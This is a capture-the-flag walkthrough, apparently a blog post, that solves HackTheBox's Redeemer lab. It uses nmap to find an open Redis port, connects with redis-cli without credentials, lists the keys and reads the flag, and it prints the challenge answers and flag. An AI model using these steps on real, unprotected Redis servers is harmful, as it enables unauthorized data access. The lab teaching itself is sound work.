Redeemer by HackTheBox is indeed a very good challenge. So in this writeup/walkthrough we are going to see how we can pwn(hack) the Redeemer. If you want video solution here is in English Version
And in Hindi Version(हिंदी में)
Now let’s continue to our walkthrough
Fire up the terminal and scan for the machine
wesecure1337@kali:~$ nmap -sV {target_ip}
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 12:08 IST
Nmap scan report for 10.129.224.90
Host is up (0.31s latency).
All 1000 scanned ports on 10.129.224.90 are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.88 seconds
Looking at the results it clearly shows that
All 1000 scanned ports on 10.129.224.90 are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)Dead end???
If you don’t specify the port number nmap scan top 1,000ports by default. Scaning all the 65,535 ports will require powerful machines. So we are going to do some smart work instead of hard-work using all the available information.
If you look at the TASK 3 , it is saying about Redis database with this information simple googling redis port no says that redis uses 6379 port number. I now I modify nmap scan
wesecure1337@kali:~$ nmap -sV -p6379 {target_ip}
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-23 12:29 IST
Nmap scan report for target_ip
Host is up (0.30s latency).PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 5.0.7Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.69 seconds
From this result we get
PORT STATE SERVICE VERSION
6379/tcp open redis Redis key-value store 5.0.7Back to Tasks
TASK 1Which TCP port is open on the machine?
6379
From the output of nmap scan we see that
TASK 2Which service is running on the port that is open on the machine?
redis
Simple googling is redis in-memory database we find that it is in-memory
TASK 3What type of database is Redis? Choose from the following options: (i) In-memory Database, (ii) Traditional Database
In-memory Database
redis-cli is a tool to interact with Redis server
TASK 4Which command-line utility is used to interact with the Redis server? Enter the program name you would enter into the terminal without any arguments.
redis-cli
In terminal type redis-cli --help , you will see the help menu of redis-cli , there you can see that to specify hostname -h flag is used.
TASK 5Which flag is used with the Redis command-line utility to specify the hostname?
-h
Now let’s connect to Redis server,
wesecure1337@kali:~$ redis-cli -h {target_ip}
target_ip:6379> info
10.129.224.90:6379> info
# Server
redis_version:5.0.7
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:66bd629f924ac924
redis_mode:standalone
os:Linux 5.4.0-77-generic x86_64
arch_bits:64
multiplexing_api:epoll
atomicvar_api:atomic-builtin
gcc_version:9.3.0
process_id:753
run_id:c44cdeb60316ddf4be3b928717ef9503c76bd8b1
tcp_port:6379
uptime_in_seconds:2220
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:14393244
executable:/usr/bin/redis-server
config_file:/etc/redis/redis.conf# Clients
connected_clients:1
client_recent_max_input_buffer:2
client_recent_max_output_buffer:0
blocked_clients:0# Memory
used_memory:859624
used_memory_human:839.48K
used_memory_rss:6569984
used_memory_rss_human:6.27M
used_memory_peak:859624
used_memory_peak_human:839.48K
used_memory_peak_perc:100.00%
used_memory_overhead:846142
used_memory_startup:796224
used_memory_dataset:13482
used_memory_dataset_perc:21.26%
allocator_allocated:1564792
allocator_active:1937408
allocator_resident:13385728
total_system_memory:2084024320
total_system_memory_human:1.94G
used_memory_lua:41984
used_memory_lua_human:41.00K
used_memory_scripts:0
used_memory_scripts_human:0B
number_of_cached_scripts:0
maxmemory:0
maxmemory_human:0B
maxmemory_policy:noeviction
allocator_frag_ratio:1.24
allocator_frag_bytes:372616
allocator_rss_ratio:6.91
allocator_rss_bytes:11448320
rss_overhead_ratio:0.49
rss_overhead_bytes:-6815744
mem_fragmentation_ratio:8.04
mem_fragmentation_bytes:5752368
mem_not_counted_for_evict:0
mem_replication_backlog:0
mem_clients_slaves:0
mem_clients_normal:49694
mem_aof_buffer:0
mem_allocator:jemalloc-5.2.1
active_defrag_running:0
lazyfree_pending_objects:0# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1658559093
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:0
rdb_current_bgsave_time_sec:-1
rdb_last_cow_size:421888
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
aof_last_cow_size:0# Stats
total_connections_received:12
total_commands_processed:10
instantaneous_ops_per_sec:0
total_net_input_bytes:364
total_net_output_bytes:36196
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
expired_stale_perc:0.00
expired_time_cap_reached_count:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:404
migrate_cached_sockets:0
slave_expires_tracked_keys:0
active_defrag_hits:0
active_defrag_misses:0
active_defrag_key_hits:0
active_defrag_key_misses:0# Replication
role:master
connected_slaves:0
master_replid:8463ea7aa6638e11303e36eab8ac49215c8f7f44
master_replid2:0000000000000000000000000000000000000000
master_repl_offset:0
second_repl_offset:-1
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0# CPU
used_cpu_sys:2.618540
used_cpu_user:2.129964
used_cpu_sys_children:0.000000
used_cpu_user_children:0.001792# Cluster
cluster_enabled:0# Keyspace
db0:keys=4,expires=0,avg_ttl=0
10.129.224.90:6379>
So we can solve the Task 6
TASK 6Once connected to a Redis server, which command is used to obtain the information and statistics about the Redis server?
info
From our nmap scan we see the version of redis
TASK 7What is the version of the Redis server being used on the target machine?
5.0.7
Simple googing select database in redis brings us to
TASK 8Which command is used to select the desired database in Redis?
select
The last line of the info says about the Task 9
db0:keys=4,expires=0,avg_ttl=0TASK 9How many keys are present inside the database with index 0?
4
In most database cases * is used for all type operations
TASK 10Which command is used to obtain all the keys in a database?
keys *
Now looking inside the Redis server
target_ip:6379> keys *
1) "flag"
2) "numb"
3) "temp"
4) "stor"
target_ip:6379> get flag
"03e1d2b376c37ab3f5319922053953eb"
target_ip:6379>And finally suubmit the flag to complete the Redeemer challenge
SUBMIT FLAGSubmit root flag
03e1d2b376c37ab3f5319922053953eb
Voila! We have successfully solved the Redeemer Challenge by HackTheBox. If you enjoyed hacking this challenge and excited about it, go and checkout our other Writeups/Walthroughs.
Let’s get connected
Twitter: proton_sec
GitHub: proton-sec
LinkedIn: protonsec
If you want to appreciate and support my work here you go…
Thanks for Reading!!!
